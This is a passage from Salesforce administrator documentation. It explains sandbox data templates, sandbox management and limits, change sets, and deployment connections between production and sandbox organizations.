Sandbox data templates allow you to pick specific objects and data to copy to your Full Sandbox, so you can control the size
and content of each sandbox. Sandbox data templates are only available for use with a Full Sandbox.

When you create a sandbox data template, you select the object data (standard and custom) to copy. All of the records for the
selected objects are copied to the new sandbox.

Some objects are included even before you’ve selected anything because they’re required in any organization. The template
starts with all of the required objects and metadata for a Configuration Only sandbox, and then adds the object data you
selected in the template. Other objects are added automatically when you select objects that are dependent on them. As you
configure the template, the Copy Statistics panel shows you an estimate of how much data would be copied to a sandbox based
on this template.

As you change the schema of the objects in your organization, Salesforce updates the template by adding or subtracting the
related, included objects. For example, if Object A is a master of Object B, and you add Object B to a template, Salesforce
requires Object A in the template, and adds Object A.
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1. From Setup, click Sandboxes > SandboxTemplates tab.
2. Click New Sandbox Template or click Edit next to an existing template you want to modify.
3. Enter a name and description for the sandbox template.
4. To add objects to the template, select the checkbox for each object you want from the available Objects list.

The Object Details section shows you the objects to be added automatically with the one you’ve selected.
5. To remove objects from the template, deselect the checkbox for the object in the available Objects list.

If you remove an object you previously selected, dependent objects you didn’t explicitly select are removed. If you attempt
to remove an object with dependent objects, you’ll receive a warning requesting a confirmation of the removal. Once you
confirm your choice, those objects will also be removed.

6. Click Save.

See Also:
Creating or Refreshing a Sandbox
Sandbox Overview

Managing Sandboxes
Available in: Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view a sandbox:

“Modify All Data”To create, refresh, activate, and delete sandbox:

To manage your sandboxes, in Setup click Sandboxes. Salesforce displays the available sandboxes you've purchase, as well as
a list of your sandboxes in use.

• Click New Sandbox. For information on different kinds of sandboxes, see Sandbox Overview on page 3760.

Salesforce deactivates the New Sandbox button when an organization reaches its sandbox limit. If necessary, contact
salesforce.com to order more sandboxes for your organization.

Also, Salesforce deactivates all refresh links if you have exceeded your sandbox limit.

• Administrators can click Login to log into a sandbox as a user.

Salesforce only displays this option for active sandboxes, and you must be logged in to your organization as an administrator
to see the Login button.

Users can log into the sandbox at https://test.salesforce.com by appending .sandbox_name to their Salesforce
usernames. For example, if a username for a production organization is user1@acme.com, and the sandbox is named
“test”, then the modified username to log into the sandbox is user1@acme.com.test.

• Click the Sandbox Templates tab to see a list of your Sandbox Data Templates, if you’ve created any. In the Sandbox
Templates tab, you can create a new Sandbox Data Template, create a new sandbox from an existing template, edit or
delete an existing template, or find more information about the template by clicking the template name. For more information
about creating a Sandbox Data Template, see Creating Sandbox Templates on page 3765.
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• Click Sandbox History to see a log of your sandbox creation and refresh history, including when sandboxes were created
and who created them.

• Click a sandbox name to see the sandbox detail page. On the sandbox detail page, you can:

◊ Click Refresh to replace an existing sandbox with a new copy. Salesforce only activates the Refresh button for sandboxes
that are eligible for refreshing. For full-copy sandboxes, this is any time after 29 days from the previous creation or
refresh of that sandbox. For Configuration Only sandboxes (including developer sandboxes), you can refresh once per
day. Your existing copy of this sandbox remains available while you wait for the refresh to complete. The refreshed
copy is inactive until you activate it.

◊ Click Activate to activate a refreshed sandbox. Salesforce only displays this option for sandboxes that are not activated.
You must activate your refreshed sandbox before you can access it.

Warning:  Activating a refreshed sandbox replaces the existing sandbox with the refreshed version. This
permanently deletes the existing version and all data in it. Your production organization and its data will not
be affected.

◊ Click Edit to change the name or description of the sandbox.

◊ Click Delete to remove the sandbox entirely.  If you delete a sandbox, you must wait 29 days before replacing it with
a new full-copy sandbox, or one day before you can replace it with another Configuration Only sandbox.

Warning:  Deleting a sandbox permanently erases the sandbox and all data in it. Your production organization
and its data will not be affected.

• When you’re ready to deploy your changes, use an outbound change set or the Metadata API to deploy XML file
representations of components into an organization.

See Also:
Creating or Refreshing a Sandbox
Change Sets Overview
Sandbox Restrictions and Licenses
Monitoring Metadata Deployments
Development Lifecycle Guide

Sandbox Setup Tips and Considerations
Available in: Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view a sandbox:

“Modify All Data”To create, refresh, activate, and delete sandbox:

Consider the following before you create a sandbox.
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Servers and IDs

• Salesforce substitutes a new organization ID for your sandbox in place of your production organization ID because two
organizations cannot share the same ID. So, the organization ID of your sandbox changes each time your sandbox is
refreshed. Salesforce inserts the new value in any place the organization ID is used, such as text values and metadata.

The organization ID you are currently logged into can be found in Setup at Company Profile > Company Information.
Any script or process, such as test scripts or Web-to-Lead, that depends on a “hard coded” organization ID needs to use
the current ID for the sandbox. When you deploy your changes to a production organization, update those scripts or
processes with the production organization ID.

• Salesforce stores sandbox organizations on several instances. When a sandbox is created or refreshed, an instance is selected
for your sandbox, so your sandbox organizations may appear on different instances and have different URLs.

• When data that contains object IDs is copied from your production instance into your sandbox, the object IDs in your
sandbox match the object IDs in your production instance. However, data created independently in your production
instance and sandbox will not contain matching object IDs.

Users and Contacts

• User information is included in a sandbox copy or refresh for all sandbox types. Because all Salesforce usernames must be
unique and reference a single organization, all copied usernames are modified to ensure uniqueness during the copy process.

For each username, the copy process applies modifications as necessary to generate a unique, new username:

◊ First, the sandbox name is appended to the username. For example, the username user@acme.com for a sandbox
named test becomes user@acme.com.test.

◊ If the resulting username is not unique, a second modification is performed in which a number of characters and digits
are prepended to the modified username. This second modification may result in a username such as
00x7Vquser@acme.com.test.

When you log in with the modified username, you log into the corresponding sandbox.

• The copy process doesn’t copy Contact data to developer and configuration sandboxes. Therefore, Customer Portal users
aren’t copied. However, the copy process does copy the Customer Portal licenses, so you can create Customer Portal users
in these sandboxes as needed.

• User email addresses are modified in a sandbox so that production users, who may not know of the sandbox, don’t receive
automatically generated email messages from the sandbox, such as notifications from triggered workflow or escalation
rules. If you do want sandbox users to receive automatically generated emails as part of your testing, you can manually
correct the email addresses while logged into the sandbox.

Warning: Sandboxes automatically change Salesforce user email addresses, but don’t change other email addresses
in Salesforce, such as those in contact records. To avoid sending unsolicited email from your sandboxes, manually
invalidate or delete all email addresses in your sandboxes that don’t belong to users of the sandbox. When testing
outbound email, change contact email addresses to those of testers or an automated test script.

Email Deliverability

Newly created sandboxes have the default email deliverability setting System email only. To configure email deliverability
settings, in the sandbox organization, from Setup, click Email Administration > Deliverability. If editable, set the Access
level in the Access to Send Email section. You may not be able to edit the Access level if salesforce.com has
restricted your organization’s ability to change this setting.

• No access>: Prevents all outbound email to and from users.
• System email only: Allows only automatically generated emails, such as new user and password reset emails.
• All email>: Allows all types of outbound email. Default for new, non-sandbox organizations.
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Tip: The System email only setting is especially useful for controlling email sent from sandboxes so that testing
and development work doesn’t send test emails to your users.

• Newly created sandboxes default to System email only.
• Sandboxes created before ’Spring 13 default to All email.

Creating, Refreshing, and Deleting Sandboxes

• Sandbox copy is a long-running operation that occurs in the background. You are notified of the completion of a sandbox
copy via email. Sandbox refreshes might complete in minutes, days, or even more than a week.

• A number of conditions factor into the duration of a sandbox copy or refresh, including the number of customizations,
data size, numbers of objects and configuration choices (for full copies), and server load. Also, sandbox refreshes are queued,
so your requested copy may not start immediately after your request.

• A sandbox is not a point-in-time snapshot of the exact state of your data. Furthermore, we recommend that you limit
changes to your production organization while a sandbox is being created or refreshed. Setup and data changes to your
production organization during the sandbox creation and refresh operations may result in inconsistencies in your sandbox.
You might detect and correct some inconsistencies in your sandbox after it is copied or refreshed.

• Some types of sandboxes might not be available to choose from if you already reached your organization's limit of the types
of sandboxes you can create or refresh. For example, if your organization is limited to one full sandbox, and a full sandbox
is already created, you may not select a Full sandbox when creating a new sandbox. However, you may refresh your existing
Full sandbox.

• When you are finished with a sandbox, you can refresh it to create a new copy. However, if you have reduced your
organization's number of sandboxes, a Delete link displays next to existing sandboxes, allowing you to delete a sandbox
of your choice. Note that you must delete a sandbox before you can refresh any more sandboxes.

• If you have active Salesforce-to-Salesforce connections in your sandbox, you must deactivate and then reactivate the
connection(s) after the sandbox is refreshed.

Configuring Full Sandboxes

When you create or refresh a full sandbox, you can configure it not to copy some data that is generally not useful in a sandbox.
Keeping the minimum selections will speed up your sandbox copy.

• The Object History, Case History, and Opportunity History options allow you to select the number of days of history
from your production organization to copy to your sandbox. You can copy from 0 to 180 days of history, in 30–day
increments. The default value is 0 days.

• By default, Chatter data won’t be copied to your sandbox. Chatter data includes feeds, messages, and discovery topics.
Select the Copy Chatter Data checkbox if you need to copy it.

• The setup audit trail history of your production organization won’t be copied to your sandbox. The audit trail for your
sandbox organization will start when you begin to use it.

• Archived activities (tasks and events that aren’t available in the production organization because they’re over a year old)
and password history (users’ previous passwords) won’t be copied to your sandbox.

Note:  Don’t increase the default selections unless special circumstances require it. Too much data can cause significant
delays in the time it takes to copy your sandbox.

Accessing Sandboxes

• Access changes for sandbox users:

◊ A sandbox refresh deletes and recreates the sandbox as a new copy of the production organization. In effect, this reverses
any manual access changes you've performed. If you created sandbox-only users, they will no longer exist, and a user’s
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profile and permissions revert to their values in the production organization. This means that after a refresh, any access
changes will need to be repeated in the new copy.

◊ You can create users in your production organization that are inactive, and then activate them in a sandbox. This is a
good way to create a user in a sandbox that has the appropriate permissions to develop in a sandbox.

◊ Many development and testing tasks require the “Modify All Data” permission. Because your developers might not
have that permission in the production organization, you may need to increase their permissions in a sandbox. Exercise
caution when granting this permission in sandbox organizations that contain sensitive information copied from production
(for example, social security numbers).

◊ You can create new users for sandbox development, but these count against the number of licensed users in your
organization. To reduce your license count, you can disable production users who won’t need access to the sandbox.

◊ To grant users access to a sandbox, you must log in as the administrator on the sandbox organization, and then create
or upgrade user access in the sandbox.

• Always log in to your sandbox organization using the https://test.salesforce.com login URL.
• Remember to log in using the modified username as described in Users and Contacts on page 3768.
• If using the API, after you log in you must use the redirect URL that is returned in the loginResult object for subsequent

access. This URL reflects the instance on which the sandbox is located and the appropriate server pool for API access.
• All sandbox copies are made with federated authentication with SAML disabled. Any configuration information is preserved,

except the value for Recipient URL. The Recipient URL is updated to match your sandbox URL, for example
http://cs1.salesforce.com, after you re-enable SAML. To enable SAML in the sandbox copy, from Setup, click
Security Controls > Single Sign-On Settings; then click Edit, and select SAML Enabled. You must change the value
of the Recipient URL in the certificate for your client application as well.

Sandbox Storage Limits

• Full copy sandboxes have the same storage limit as your production organization.
• Configuration Only sandboxes have a 500 MB storage limit.
• Developer sandboxes have a 10 MB storage limit.
• Sandboxes don’t send email notifications when storage limits are reached. However, if you reach the storage limit of your

sandbox, you cannot save new data in your sandbox. To check your storage limits, from Setup, click Data Management
> Storage Usage in your sandbox.

Customization and Data Changes

• Customizations and data changes in your production organization don’t automatically appear in your sandboxes. You must
create a new sandbox or refresh an existing one to see the customizations made to your organization since the last time
you created or refreshed a sandbox.

• You can only add, edit, or delete Apex using the Salesforce user interface in a Developer Edition or sandbox organization.
In a Salesforce production organization, you can only make changes to Apex by using the compileAndTestAPI() call.

• If your sandbox is the same version as Force.com AppExchange, you can:

◊ Install and deploy apps from Force.com AppExchange in your sandbox.
◊ Publish apps from your sandbox to Force.com AppExchange.

Publishing managed packages from a Force.com Sandbox is not advised, as refreshing or deleting the sandbox will
prevent any revisions to that managed package.

The version of your sandboxes may differ from Force.com AppExchange around the time of a Salesforce release. Check
the logo in the upper left corner of your sandbox home page for version information.

• If your organization uses quote templates, and you create a Configuration Only sandbox, templates that contain Text/Image
fields cannot be opened for editing within the sandbox.
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• If your production organization uses an image in quote templates and you copy the organization to your sandbox, the image
path will no longer be correct and the image will appear as a broken link. To display the image, reinsert it from the correct
location on your sandbox.

Service Exclusions

• The following features are disabled and cannot be enabled in sandboxes:

◊ Case escalation.
◊ Contract expiration warnings.

Case escalation, and contract expiration warnings are disabled because they automatically send email to contacts,
customers, and users who should not interact with sandboxes.

◊ Subscription summary.
◊ Data exports (in Setup at Data Management > Data Export > Export Now or Data Management > Data Export >

Schedule Export).
◊ The ability to create Salesforce sandboxes.
◊ Email service addresses that you create in your sandbox cannot be copied to your production organization.
◊ The ability to publish Site.com sites.

Other Service Differences

• Only custom links created as relative URLs, such as /00Oz0000000EVpU&pv0={!Account_ID} will work when copied
to your sandboxes. Custom links created as absolute URLs, such as
https://na1.salesforce.com/00Oz0000000EVpU&pv0={!Account_ID}, don’t work in your organization's
sandboxes. We recommend that you use only relative URLs in your production organization. Otherwise, you will need to
correct the URLs in each sandbox.

• Salesforce has a background process that permanently deletes records in the Recycle Bin that are older than 30 days. This
process runs at different times on different servers, so its timestamp in your sandbox differs from its timestamp in your
production organization. Applications and integrations that depend on this timestamp may fail if they are first connected
to one environment, such as your production organization, and then later connected to another environment, such as your
sandbox. Keep this in mind when developing applications and integrations that depend on this timestamp.

Note that the time of the latest execution of the background delete process is available through the getDeleted() API
call.

See Also:
Creating or Refreshing a Sandbox
Sandbox Overview
Sandbox Restrictions and Licenses

Sandbox Restrictions and Licenses
Available in: Enterprise, Unlimited, and Database.com Editions

The following information includes restrictions and troubleshooting information for access to sandboxes.
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Sandbox services are restricted if your organization doesn't comply with salesforce.com's licensing rules. This typically happens
when sandbox licenses expire.

As sandbox licenses expire, Salesforce.com decreases the count of available sandbox licenses for the selected sandbox type.

Note: Salesforce.com does not automatically delete sandbox organizations due to a license expiration. When the
licenses expire and your current license count is lower than the number of provisioned sandbox organizations,
Salesforce.com removes sandbox services, such as Refresh, Sandbox Org Accessibility, or Login.

There are a few different types of restrictions you might encounter when your organization doesn't comply with licensing
rules.

Unactivated Sandboxes

New sandboxes that aren’t activated within 30 days will be deleted. Users who have created or most recently refreshed
any sandbox for your organization will get at least two email notifications before we schedule the sandbox for deletion.

Locked Sandboxes

Sandboxes that have been locked for 60 days will be deleted. Users who have created or most recently refreshed any
sandbox for your organization will be notified prior to scheduling the sandbox for deletion. They will get at least three
email notifications over 30 days. Sandboxes become locked when all the licenses for that type of sandbox expire.

Unused Sandboxes

Sandboxes that no one has logged into for 180 days will be deleted. Users who have created or most recently refreshed
any sandbox for your organization will be notified prior to scheduling the sandbox for deletion. They will get at least
three email notifications over 30 days. To keep a sandbox active and avoid email notifications, log in periodically.

Based on licensing and usage, you might encounter the following scenarios. Follow the suggested resolutions:

Unable to Refresh a Particular Type of Sandbox

Cause—Your organization is using more sandboxes of a specific type than its sandbox licenses permit.

Example—Your organization has three full sandboxes, but only two full sandbox licenses.

Effect—You can't refresh a sandbox of this type. In the example, you can't refresh full sandboxes.

Resolution—Delete sandboxes to comply with the number allowed by your organization's sandbox licenses, or purchase
more sandbox licenses.

All Sandboxes of a Particular Type are Locked

Cause—The license count of a given type, including higher hierarchical types, is zero.

Example—Your organization has three full sandboxes and zero full sandbox licenses.

Effect—All sandboxes of a particular type are locked. You don't have access to the sandboxes.

Resolution—Purchase the correct sandbox licenses to unlock the sandboxes. If you don't purchase enough licenses, you
can't refresh sandboxes of that type.

All Sandboxes are Locked

Cause—Your production organization is locked.

Example—Your organization has one full sandbox and one developer-sandbox, but you can't log in to either sandbox.

Effect—If your production organization is locked, all sandboxes associated with the organization are locked.
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Resolution—Contact your salesforce.com representative to unlock your organization. When your production organization
is unlocked, the sandboxes are unlocked as well.

See Also:
Sandbox Overview
Creating or Refreshing a Sandbox
Managing Sandboxes
Sandbox Setup Tips and Considerations

DEPLOY

Deploying Changes
This section contains information about deploying to your organization the changes you coded.

• Deployment Overview

• Using Tools for Developing and Deploying Apex

Deployment Overview
User Permissions Needed

“Deploy Change Sets”To edit deployment connections:

“Create and Upload Change Sets,”

“Create AppExchange Packages,”

AND

“Upload AppExchange Packages”

To use outbound change sets:

“Deploy Change Sets”To use inbound change sets:

From Setup, click Deploy to access tools used for migrating metadata changes between organizations.

Deployment Connections

In order to use the change sets feature, a deployment connection is required. You can specify connection permissions
for both outbound and inbound change sets on the Deployment Connections page.

Outbound Change Sets

Make changes in the organization you are logged into, and upload those changes to another organization.
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Inbound Change Sets

Accept, modify, or reject change sets uploaded from other organizations.

From Setup, click Monitor > Deployments to monitor the progress of deployments made through the Metadata API.

See Also:
Change Sets Overview
Monitoring Metadata Deployments

CHANGE SETS

Change Sets Overview
Available in Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Deploy Change Sets”To edit deployment connections:

“Create and Upload Change Sets,”

“Create AppExchange Packages,”

AND

“Upload AppExchange Packages”

To use outbound change sets:

“Deploy Change Sets”To use inbound change sets:

A change set is a means by which one organization can send customizations to another organization. For example, you could
create a new object in a sandbox organization and send it to your production organization using a change set. Change sets can
only contain modifications you can make through the Setup menu; therefore, you can't use a change set to upload a list of
contact records. In other words, change sets contain metadata, not data.

When you want to send customizations from your current organization to another organization, you create an outbound change
set. Once you send the change set, the receiving organization sees it as an inbound change set.
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Sending a change set between two organizations requires a deployment connection. Change sets can only be sent between
organizations that are affiliated with a production organization—for example, a production organization and a sandbox, or
two sandboxes created from the same organization.

See Also:
Inbound Change Sets
Outbound Change Sets
Components Available in Change Sets

About Permission Sets and Profile Settings in Change Sets
Available in Enterprise, Unlimited, and Database.com Editions

Developers can use permission sets or profile settings to specify permissions and other access settings in a change set. When
deciding whether to use permission sets, profile settings, or a combination of both, consider the similarities and differences.

Profile SettingsPermission SetsBehavior

Included permissions and settings • Assigned apps• Standard object permissions

• •Standard field permissions Tab settings

•• Page layout assignmentsUser permissions (such as “API
Enabled”) • Record type assignments

• Login IP rangesNote:  Assigned apps and tab
settings are not included in
permission set components.

Included permissions and settings that
require supporting components

•• Custom object permissionsCustom object permissions

• •Custom field permissions Custom field permissions

•• Apex class accessApex class access

• •Visualforce page access Visualforce page access

No. Profiles are added in a separate
setting.

YesAdded as a component?

For custom object permissions, custom field permissions, Visualforce page access, and Apex class access, you must include
supporting components in the change set. For example, object permissions for the custom object Items are included only if the
Items object is also included.
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Note:  Login IP ranges included in profile settings will overwrite the login IP ranges for any matching profiles in the
target organization.

See Also:
Inbound Change Sets
Outbound Change Sets

Components Available in Change Sets
The following types of components may be added to a change set.

Note:

• The components available for a change set vary by edition.

• If you create or modify components that aren’t available in a change set, you can't send those components from
one organization to another in a change set. In this case, migrate the changes manually by repeating the steps you
performed when you created or modified the component.

• List views and tabs are visible to all users when you deploy a change set. Change the visibility in the destination
organization if necessary.

• Account Criteria Based Sharing Rule

• Account Owner Sharing Rule

• Account Territory Owner Sharing Rule

• Action (includes object-oriented publisher actions and global publisher actions)

• Analytic Snapshot

• Apex Class

• Apex Sharing Reason

• Apex Trigger

• App

• Approval Process (with some restrictions)

• Assignment Rule

• Auth. Provider

• AutoResponse Rule

• Button or Link

• Call Center

• Campaign Criteria Based Sharing Rule

• Campaign Owner Sharing Rule

• Case Criteria Based Sharing Rule

• Case Owner Sharing Rule

• Communities (Zones)

• Contact Criteria Based Sharing Rule

• Contact Owner Sharing Rule
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• Custom Data Type

• Custom Field

• Custom Label

• Custom Object

• Custom Object Criteria Sharing Rule

• Custom Object Owner Sharing Rule

• Custom Report Type

• Custom Setting

• Dashboard

• Document

• Email Template

• External Data Source

• Escalation Rule

• Field Set

• Flow

• Folder

• Group

• Home Page Component

• Home Page Layout

• Letterhead

• Language Translation

• Lead Criteria Based Sharing Rule

• Lead Owner Sharing Rule

• List View

• Opportunity Criteria Based Sharing Rule

• Opportunity Owner Sharing Rule

• Page Layout

• Permission Set

• Queue

• Record Type

• Remote Site

• Report

• Role

• S-Control

• Send Action

• Static resource

• Tab

• Territory

• Validation Rule

• Visualforce Component

• Visualforce Page

• Workflow Email Alert

• Workflow Field Update

3777

Components Available in Change SetsDeploy



• Workflow Outbound Message

• Workflow Rule

• Workflow Task

• Workflow Time Trigger

See Also:
Validating a Change Set
Creating an Outbound Change Set
Selecting Components for an Outbound Change Set

Restrictions for Approval Processes in Change Sets
Understand these restrictions before you include approval processes in change sets.

• If the approval page fields include any custom fields on standard objects, you need to manually add those custom fields to
outbound change sets. The View/Add Dependencies option for selecting change set components won’t include these
fields.

• Post templates for Approvals in Chatter can’t be uploaded to another organization via change sets. Either remove references
to post templates from the approval process before upload, or recreate the post templates in the destination organization
before deploying the approval process.

• If you change the Unique Name (fullName) of an approval process that was previously included in a change set and
deployed in another organization, and you resend the approval process via a change set, a new approval process will be
created upon deployment in the other organization. The previously deployed approval process will not be modified.

Change Sets Implementation Tips
Authorization required to upload changes

Before you can deploy a change set from one organization to another, an administrator in the target organization must
authorize uploads across the deployment connection between the two organizations.

Deployment Connections list displays all connections

The Deployment Connections list is automatically populated with your production organization and all sandboxes. It
is possible to deploy between any of these organizations, but no other organizations.

Change set connections unavailable during maintenance

Authorizing deployment connections and uploading pages require information from the production organization, and
are unavailable when production is undergoing maintenance. During this time you can construct outbound change sets
but not upload them.

Sandboxes must be available

If an organization has no sandboxes provisioned, the user may see an Insufficient Privileges error on the Deployment
Connections page.
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Deployment doesn’t automatically restart

If an error occurs during change set validation or deployment, you must manually restart the process. Be sure your
organization is not locked, undergoing maintenance, or otherwise inaccessible.

Deployment is a one-way transaction

A change set is deployed in a single transaction. If the deployment is unable to complete for any reason, the entire
transaction is rolled back. After a deployment completes successfully, all changes are committed to your organization
and the deployment can’t be rolled back.

Deployments maintain user references

If a component in a change set refers to a specific user, such as recipients of workflow email notifications or dashboard
running users, then during deployment the system attempts to locate a matching user in the destination organization by
comparing usernames.

When you copy data to a sandbox, the fields containing usernames from the production organization are altered to
include the sandbox name. For example, in a sandbox named test, the username user@acme.com becomes
user@acme.com.test. During a deployment using change sets, the .test in the username is ignored. This process
transfers a user added to a component in one sandbox to other sandboxes or production organizations.

See Also:
Change Sets Best Practices

Change Sets Best Practices
Deploy all dependent components

Make sure each outbound change set contains all interdependent components that don't exist in the target organization.
If you try to deploy a component that refers to another component missing from the target organization and from the
change set, the deployment fails.

Change sets give you fine-grained control over what you deploy. For example, you can migrate custom fields individually.
To deploy a custom object and all of its fields, you must add the custom object and every field to the change set; adding
just the custom object to the change set won't cause deployment to fail, but results in an empty custom object.

Add permissions and access settings to outbound change sets

Adding profiles or permission sets to outbound change sets allows administrators to migrate permissions for users so
they can access the new functionality. Profiles contain access settings for more components than permission sets, including
page layouts, record types, and tab settings. However, permission sets contain access to standard object permissions,
standard field permissions, and user permissions (such as “API Enabled”).

Clone a change set to add dependent components to an uploaded change set

After you upload a change set, you can't change its contents. If you need to add dependent components to a change set
you already uploaded, clone the change set, add the dependent components, and then upload it again.

Plan deployments around maintenance schedule

Plan your deployment activities around the maintenance schedule for both your production and sandbox organizations.
Some features require information from your production organization when accessed from a sandbox. In addition, the
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originating organization is locked while validating an outbound change set, and the target organization is locked while
deploying an inbound change set. (When change sets lock an organization, you can still read and write data to the
organization, but you can’t make any setup changes that would modify the metadata.)

Validate change sets before deployment

You can perform a test deployment of an inbound change set to view the success or failure messages that would occur
with an actual deployment. This is a good idea if you are planning a deployment on a schedule (for example during
low-use hours) and want to determine if the deployment will succeed ahead of time. However, you don't need to perform
a test deployment every time you deploy, as this process takes time to complete and the organization is locked for the
duration. (You can still read and write data to the organization, but you can’t make any setup changes that would modify
the metadata.) To test deploy an inbound change set, click its name and then click Validate.

View component details

You can view the XML representation of a component before you upload an outbound change set or deploy an inbound
change set.

Limit change sets to 5,000 files

Change sets are limited to 5,000 files. If your change set exceeds this limit, you can create separate change sets for email
templates, dashboards, and reports. These components are often the most numerous and have fewer dependencies.

Delete or rename components using the Web interface

You can't use change sets to delete or rename components. To delete components, use the Web interface on the target
organization. To rename a component, first delete the component on the target organization and then upload the new
component in a change set.

Plan for tests to run in the target organization

When a change set is deployed to a production organization, all of the Apex tests in that organization are run, regardless
of whether the classes or tests are part of the change set. If the target organization is a sandbox, however, tests aren’t
automatically run.

See Also:
Change Sets Implementation Tips

DEPLOY INBOUND CHANGES

Inbound Change Sets
User Permissions Needed

“Deploy Change Sets”To deploy inbound change sets:

Watch a Demo: Change Sets Overview (2:30 minutes)
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An inbound change set is a change set that has been sent from another organization to the organization you are logged into. A
change sent must be deployed for the changes to take effect. You can deploy the contents of an inbound change set as a whole,
but not on a component-by-component basis.

See Also:
Viewing Inbound Change Sets
Outbound Change Sets
Change Sets Overview

Viewing Inbound Change Sets
The Inbound Change Sets page lists change sets awaiting deployment, as well as the history of deployed change sets. To view
inbound change sets, from Setup, click Deploy > Inbound Change Sets.

Note:  Inbound change sets are permanently deleted six months after the change set is uploaded.

See Also:
Viewing Change Set Details
Validating a Change Set
Deploying a Change Set

Viewing Change Set Details
The Change Sets detail page lists information about a particular change set.

1. From Setup, click Deploy > Inbound Change Sets.
2. Click the name of a change set.

See Also:
Viewing Inbound Change Sets
Validating a Change Set
Deploying a Change Set

Validating a Change Set
You can validate a change set without deploying changes. Validating a change set allows you to view the success or failure
messages you would receive with an actual deploy.

1. From Setup, click Deploy > Inbound Change Sets.
2. Click the name of a change set.
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3. Click Validate.

Note:  You can't make any changes to your organization while a test deployment is in progress.

4. After the validation completes, click View Results.

See Also:
Viewing Inbound Change Sets
Viewing Change Set Details
Deploying a Change Set

Deploying a Change Set
To deploy a change set:

1. From Setup, click Deploy > Inbound Change Sets.
2. In the Change Sets Awaiting Deployment list, click the name of the change set you want to deploy.
3. Click Deploy.

A change set is deployed in a single transaction. If the deployment is unable to complete for any reason, the entire transaction
is rolled back. After a deployment completes successfully, all changes are committed to your organization and the deployment
can’t be rolled back.

Note: The Force.com platform requires that at least 75% of your code is covered by unit tests before you can deploy
it to a production organization. Ideally, you should strive for 100% coverage. The code coverage restriction is not
enforced for sandbox or Developer Edition organizations.

See Also:
Viewing Inbound Change Sets
Viewing Change Set Details
Monitoring Deployments

Monitoring Deployments
The size and complexity of the change set determines how long it takes for a change set to deploy. During this time, it can be
helpful to monitor the deployment. To track the status of deployments that are in progress from Setup, click Deploy > Inbound
Change Sets > Change Set Detail. Under the Deployment History related list, click View Results.
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Note:  The Monitor Deployments page can be used for checking the status of deployments made through the Metadata
API. However, change sets are not currently supported in the Monitor Deployments page.

See Also:
Deploying a Change Set
Deployment Connections

CONNECT ORGANIZATIONS FOR DEPLOYMENT

Deployment Connections
User Permissions Needed

“Deploy Change Sets”To edit deployment connections:

In order for change sets to be sent from one organization to another, a deployment connection is required between the
organizations. Deployment connections can't be created between arbitrary organizations; instead, a deployment connection
is created between all organizations affiliated with a production organization. For example, if you have a production organization
(Prod) and two sandboxes (Dev and Test), a deployment connection is created between production and each sandbox (Prod
and Dev, and another connection between Prod and Test), as well as between the sandboxes (Dev and Test).

A deployment connection alone doesn't enable change sets to be sent between organizations. Each organization must be
authorized to send and receive change sets. This added level of security enforces code promotion paths and keeps organizations'
setup metadata from being overwritten by mistake.

For example, the following figure illustrates one possible migration path for a production organization and two sandboxes. In
this example, the production organization can only receive changes that have been fully tested, so only the Test sandbox is
authorized to upload change sets to production. In order to synchronize development projects with the production organization,
the Prod organization can send change sets to the Dev sandbox, but not to the Test sandbox. Finally, because the features in
development need iterative testing, Dev and Test sandboxes should be able to send change sets back and forth.
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Figure 24: Change Set Authorization Enforces Code Path

Note:  This illustration describes one possible code migration path. Your department must create its own policies for
organizations to send and receive change sets to one another.

See Also:
Deploying a Change Set
Viewing Available Deployment Connections
Authorizing a Deployment Connection
Viewing Details of a Deployment Connection

Authorizing a Deployment Connection
In order for another organization to send change sets to the organization you are logged into, you must authorize the inbound
change set:

1. From Setup, click Deploy > Deployment Connections.
2. Click Edit next to the organization you want to authorize.
3. Select Allow Inbound Changes.
4. Click Save.

See Also:
Viewing Available Deployment Connections
Viewing Details of a Deployment Connection
Deployment Connections
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Viewing Available Deployment Connections
A deployment connection enables customizations to be copied from one organization to another. The deployment connections
list shows which organizations are authorized to upload changes to this organization, and which organizations allow this
organization to upload changes to them.

To view available connections, from Setup, click Deploy > Deployment Connections.

Action

Click Edit next to the organization that you want to allow or disallow change sets from.

Name

A list of organizations that have deployment connections to the organization you are currently logged into. Click the
name of an organization to view more information about the connection.

Description

A brief description of the connected organizations.

Type

The type of organization you are connected to. Possible values are Production, Full Copy Sandbox, Configuration Only
Sandbox, and Developer Sandbox.

Upload Authorization Direction

The arrows show the direction in which uploads can occur. A broken line means that no change sets are authorized in
either direction. To authorize the connected organization to send you inbound change sets, edit the deployment connection
for this organization. If you want to send outbound change sets to a connected organization, the administrator for that
organization must edit the connection for that organization.

See Also:
Authorizing a Deployment Connection
Viewing Details of a Deployment Connection
Deployment Connections

Viewing Details of a Deployment Connection
A deployment connection enables customizations to be copied from one organization to another. The deployment connections
list shows which organizations are authorized to upload changes to this organization, and which organizations allow this
organization to upload changes to them.

To view connection details:

1. From Setup, click Deploy > Deployment Connections.
2. Click the name of the organization you want to view.

Name

The name of the selected organization. This is not the organization you are logged into.
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Description

A brief description of the organization.

Type

The type of organization you are connected to. Possible values are Production, Full Copy, Configuration Only, and
Developer.

Allow Inbound Changes

If selected, the named organization can send change sets to the organization you are currently logged into. This is a
read-only field and can only be modified by selecting Allow Inbound Changes in the target organization.

Accepts Outbound Changes

If selected, the named organization allows change sets to be sent to it from the organization you are currently logged
into.

See Also:
Authorizing a Deployment Connection
Viewing Available Deployment Connections
Deployment Connections

UPLOAD OUTBOUND CHANGES

Outbound Change Sets
User Permissions Needed

“Create and Upload Change Sets”To create, edit, or upload outbound change sets:

Watch a Demo: Change Sets Overview (2:30 minutes)

An outbound change set is a change set created in the organization you are logged into and that you want to send to another
organization. Typically, an outbound change set is used for customizations created and tested in a sandbox and then sent to
a production organization.

Sending an outbound change set to another organization doesn't guarantee that the changes will be implemented in that
organization. The change set must be deployed (accepted) by the target organization before the changes take effect.
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Note:  Change sets are limited to 2,500 components and a total file size of 400 MB.

See Also:
Selecting Components for an Outbound Change Set
Creating an Outbound Change Set
Inbound Change Sets
Change Sets Overview

Selecting Components for an Outbound Change Set
To select the components in an outbound change set:

1. From Setup, click Deploy > Outbound Change Sets.
2. In the Change Sets list, click the name of a change set, or create a new one.
3. Click Add to add components.
4. Choose the type of component and the components you want to add, and then click Add to Change Set.
5. Click Add Profiles to add profile settings to the change set.
6. Optionally, click View/Add Dependencies to add dependent components.

Note:  Dependent components rely on the existence of other components. Unless you are certain that the dependent
